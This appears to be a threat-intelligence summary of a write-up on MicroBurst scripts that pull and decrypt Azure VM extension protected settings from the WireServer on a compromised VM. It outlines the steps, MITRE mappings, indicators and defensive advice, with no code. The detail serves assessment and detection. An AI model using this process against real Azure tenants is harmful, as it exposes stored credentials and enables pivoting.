This article describes tools and a process to query the Azure WireServer from a compromised VM to retrieve and decrypt VM extension “Protected Settings” without directly reading local encrypted files. It provides PowerShell and Bash scripts (MicroBurst) that request goal state, fetch extension configs and certificate bundles, decrypt them using generated transport certificates, and extract sensitive settings for assessment and pivoting. #WireServer #Get-AzureVMExtensionSettingsWireServer
Keypoints
- The Azure WireServer is a cloud-local endpoint accessible only from Azure VMs and can serve VM extension configurations including protected settings.
- The general flow: request goal state, follow extension URLs, retrieve encrypted extension settings and certificate bundle, decrypt bundle with a generated transport certificate, then decrypt protected settings with extracted certs.
- MicroBurst includes PowerShell and Linux scripts that automate the WireServer retrieval and decryption process, demonstrating successful decryption of CustomScriptExtension and OpenSSH extension settings in examples.
- The tooling writes temporary and certificate files by default but can be adapted to avoid touching disk entirely; extracting private keys from bundles is possible and observed in examples.
- Detections are limited: notable indicators include execution of the provided scripts, outbound HTTP calls to the WireServer endpoint, creation of temporary/certificate files, and specific request patterns used by the scripts.
- Defensive recommendations: avoid placing sensitive data in VM extension settings, use references or temporary resources, monitor access to extension files, and consider canary credentials in extensions for early detection.
<li:Getting protected settings from the WireServer requires local administrator/root privileges and specific request headers, but can avoid reading local encrypted files directly.
MITRE Techniques
- [T1573] Encrypted Channel – Used to request and retrieve certificate bundles and protected settings from the WireServer using HTTPS and transport certificates (“Requesting certificate bond package… Retrieved certificate bond package”).
- [T1552] Unsecured Credentials – Extraction and decryption of VM extension protected settings to obtain credentials or sensitive configuration (“SUCCESS: Decrypted ProtectedSettings for the Microsoft.Compute.CustomScriptExtension extension” and resulting decrypted command/fileUris shown).
- [T1105] Ingress Tool Transfer – The process involves downloading resources referenced in extension settings (e.g., fileUris pointing to storage account blobs) which can enable transfer of scripts or payloads (“fileUris”:[“https://notarealstorageaccount.blob.core.windows.net/cse/whoami.ps1?…”]).
- [T1016] System Network Configuration Discovery – Enumerating and interacting with the WireServer endpoint (a cloud-local service) to discover goalstate and extension configurations (“Retrieving goalstate configuration… Retrieving extension configurations…”).
- [T1537] Transfer Data to Cloud Account – Use of VM extension settings and storage URIs (SAS tokens) to reference or exfiltrate sensitive data via cloud storage links included in decrypted settings (“fileUris…sp=r&st=2025-09-17…se=2025-12-16…sig=…”).
Indicators of Compromise
- [Domain ] WireServer endpoint context – outbound HTTP(S) requests from VM to the Azure WireServer public IP/endpoint (examples shown in logs as “Testing connectivity to WireServer… Connected to WireServer”).
- [File Names ] local temporary and certificate files written by scripts – examples: certificate_bond.bin, cert_DC=Windows Azure CRP Certificate Generator_B9F1F313.crt, and exported PKCS#12 files saved to certs/ (and other temp files like /tmp/microburst-080D6D).
- [Extension Names ] VM extension identifiers with protected settings – examples: Microsoft.Compute.CustomScriptExtension, Microsoft.Azure.OpenSSH.WindowsOpenSSH, Microsoft.Azure.Extensions.CustomScript (used in Linux example).
- [SAS URLs ] storage blob URIs referenced in decrypted settings – examples: https://notarealstorageaccount.blob.core.windows.net/cse/whoami.ps1?…sig=idQw8lGU0FnoK4X%2BaaQijzLl9cbbHaKN4RMdd34wrno%3D, https://notarealstorageaccount.blob.core.windows.net/cse/whoami.sh?…sig=TY29jl46inaLN2bb32xf%2B0psaa88MBn852CKapokbwQ%3D (and other SAS URIs).
- [Certificate Thumbprints ] certificate identifiers included in goal state and extension configs – examples: B9F1F313496EFF1A8B498C24BBD467E04ADB7131, B8A6C00BA1B792FC0D73DD1AC087468DA34E8E2B.